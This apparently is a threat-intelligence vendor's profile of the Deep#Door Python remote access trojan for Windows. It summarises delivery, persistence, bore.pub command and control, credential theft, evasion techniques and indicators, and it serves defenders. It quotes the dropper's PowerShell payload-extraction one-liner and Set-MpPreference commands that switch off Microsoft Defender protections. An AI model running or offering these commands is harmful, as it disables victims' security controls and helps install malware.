DEEP#DOOR
Deep#Door is a Python-based backdoor and credential-stealing remote access trojan targeting Windows systems. According to Securonix reporting cited in the provided content, it is delivered via an obfuscated batch-file dropper, most notably install_obf.bat, with some reporting also referencing finallyJob.bat. The loader disables or tampers with Windows security controls, suppresses PowerShell and firewall logging, bypasses SmartScreen, and extracts an embedded Python implant from its own script body rather than downloading a second stage. Reported implant filenames include svc.py and c.py, with svc.py written to %LOCALAPPDATA%\SystemServices\ to blend in with legitimate components.
Deep#Door establishes persistent access through multiple redundant mechanisms, including Startup folder scripts, Registry Run keys, Scheduled Tasks, and optional WMI event subscriptions. It also uses a watchdog mechanism to restore persistence artifacts if they are removed. For command and control, the malware uses the public TCP tunneling service bore.pub, including dynamic port discovery and challenge-response authentication, allowing operators to avoid dedicated attacker infrastructure and blend traffic with legitimate tunneling activity. The content specifically notes candidate outbound ports 41234-41243 and broader scanning from 1024-65535 to locate an active tunnel.
Its capabilities include remote shell/command execution, file transfer, reconnaissance, port and internal network scanning, keylogging, clipboard monitoring, screenshot capture, webcam access, microphone/audio recording, and broad credential theft. Reported theft targets include browser credentials from Chrome, Edge, Firefox, Windows Credential Manager, Wi-Fi profiles, SSH private keys, and cloud credentials or tokens associated with AWS, Azure, and GCP. The malware is described as suitable for long-term espionage, credential exfiltration, lateral movement, and post-exploitation.
Deep#Door also incorporates extensive anti-analysis and defense-evasion features, including sandbox, debugger, and virtual machine detection, AMSI and ETW patching, ntdll unhooking, Microsoft Defender tampering, command-line wiping, timestamp stomping, and event log clearing. The provided content further attributes destructive capabilities to the malware, including Master Boot Record overwrite, forced system crashes/BSOD, and a fork bomb. Distribution is assessed as likely via traditional methods such as phishing, but the scale of attacks, success rate, and specific threat actor attribution are not available in the provided content. High-confidence indicators and artifacts mentioned include install_obf.bat, finallyJob.bat, svc.py, c.py, SystemServices.vbs, the path %LOCALAPPDATA%\SystemServices, Startup-folder persistence under %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup, a Run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and outbound connections to bore.pub, especially on ports 41234-41243.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
41 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
Initial Access
Execution
5 techniques
Execution
persistence achieved through registry run keys, scheduled tasks, and startup folder entries
This is achieved using the following PowerShell command: powershell -NoP -Command “$f=[IO.File]::ReadAllText(‘%~f0′);$m=[regex]::Match($f,'(?s)#PYTHON_START\r?\n(.+?)\r?\n#PYTHON_END’);if($m.Success){[IO.File]::WriteAllText(‘%LOCALAPPDATA%\SystemServices\svc.py’,$m.Groups[1].Value)}”
The attack chain starts with a single batch file: install_obf.bat. When executed, this script reads itself, literally parsing its own contents to extract a hidden Python payload embedded directly inside the script. The extracted file, svc.py, is then written quietly to %LOCALAPPDATA%\SystemServices\ | Once active, the implant is a fully featured remote access tool. Operators can execute shell commands...
Persistence
3 techniques
Persistence
persistence achieved through registry run keys, scheduled tasks, and startup folder entries
Privilege Escalation
4 techniques
Privilege Escalation
persistence achieved through registry run keys, scheduled tasks, and startup folder entries
Optional WMI Persistence: The malware can deploy a WMI event subscription , which triggers execution based on system events or time intervals.
Stealth
8 techniques
Stealth
Attacks begin with the execution of an obfuscated batch file
Event Log Service Disruption Stops and disables: Clears existing logs
Timestamp Stomping To blend in with legitimate system files, the malware modifies file metadata: File creation, access, and modification timestamps are altered to match trusted binaries
Once written to disk, the Python payload itself contains additional layers of encoding and obfuscation , requiring runtime decoding. 1. Base64 Decoding Function ... 2. XOR Obfuscation Routine
Discovery of Deep#Door compromise has also been complicated by virtual machine, debugging tool, and sandbox environment checks
Credential Access
4 techniques
Credential Access
before proceeding with keylogging, browser credential theft, screenshot capturing, and microphone recording
as well as SSH key and cloud authentication token siphoning for lateral movement
Discovery
7 techniques
Discovery
The resulting implant operates as a fully featured Remote Access Trojan (RAT) capable of long-term persistence, espionage, lateral movement, and post-exploitation operations within compromised environments.
port_scan() scans internal or external hosts to identify reachable services and potential pivot targets.
Process Enumeration Scans running processes for analysis tools such as: Wireshark Procmon x64dbg IDA Burp Suite
Hardware Fingerprinting Uses PowerShell queries (WMI/CIM) to inspect: BIOS version strings Manufacturer and model Baseboard details
get_ssh_keys() scans user directories for private SSH keys used for remote access.
Collection
5 techniques
Collection
before proceeding with keylogging, browser credential theft, screenshot capturing, and microphone recording
before proceeding with keylogging, browser credential theft, screenshot capturing, and microphone recording
clipmon_start() monitors clipboard changes to capture copied sensitive data such as passwords or tokens.
Command and Control
4 techniques
Command and Control
MITRE ATT&CK Matrix ... Command and Control T1071.001 – Application Layer Protocol: Web Protocols
the backdoor, which communicates with attacker infrastructure using a public TCP tunneling service
Exfiltration
2 techniques
Exfiltration
Impact
1 technique
Impact
Other
4 techniques
Other
Attacks begin with the execution of an obfuscated batch file that deactivates Windows security controls prior to embedded Python payload extraction
Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableBehaviorMonitoring $true Set-MpPreference -DisableBlockAtFirstSeen $true Set-MpPreference -DisableIOAVProtection $true
IOCs tracked for this family
5 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Python-based remote access trojan/backdoor for Windows that is embedded inside a batch-file dropper, disables defenses, uses multiple persistence mechanisms, evades analysis, communicates through the public TCP tunneling service bore.pub, and supports capabilities including command execution, screenshots, audio recording, keylogging, webcam access, credential theft, SSH/cloud credential theft, network scanning, and destructive actions such as MBR overwrite or forced system crash.
A Python-based backdoor framework used for stealthy surveillance and credential theft on Windows. It is delivered via an obfuscated batch file that disables security controls, extracts embedded Python payloads, establishes persistence through registry run keys, scheduled tasks, and startup folder entries, and uses a public TCP tunneling service for command-and-control. Reported capabilities include keylogging, browser credential theft, screenshot capture, microphone recording, SSH key theft, cloud authentication token theft, anti-VM/debugging/sandbox checks, Windows telemetry patching, and boot record overwrite/system crash functionality.
Python-based Windows malware delivered via an obfuscated batch script that embeds and launches a Python RAT payload. It establishes persistence through Startup folder scripts, Registry Run keys, Scheduled Tasks, and optional WMI subscriptions; communicates through a TCP tunneling service; supports remote command execution, keylogging, webcam and microphone capture, screen capture, credential theft, lateral movement, and post-exploitation; and uses multiple defense-evasion techniques including SmartScreen disabling, AMSI/ETW patching, event log clearing, timestamp stomping, sandbox detection, unhooking, Defender tampering, and command-line stripping.
A stealthy Python-based backdoor framework and fully featured remote access trojan that establishes persistent access, communicates via the bore.pub tunneling service, enables remote command execution, surveillance, credential theft, cloud credential theft, keylogging, screenshot and webcam capture, audio recording, and uses extensive anti-analysis, defense evasion, and persistence mechanisms.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.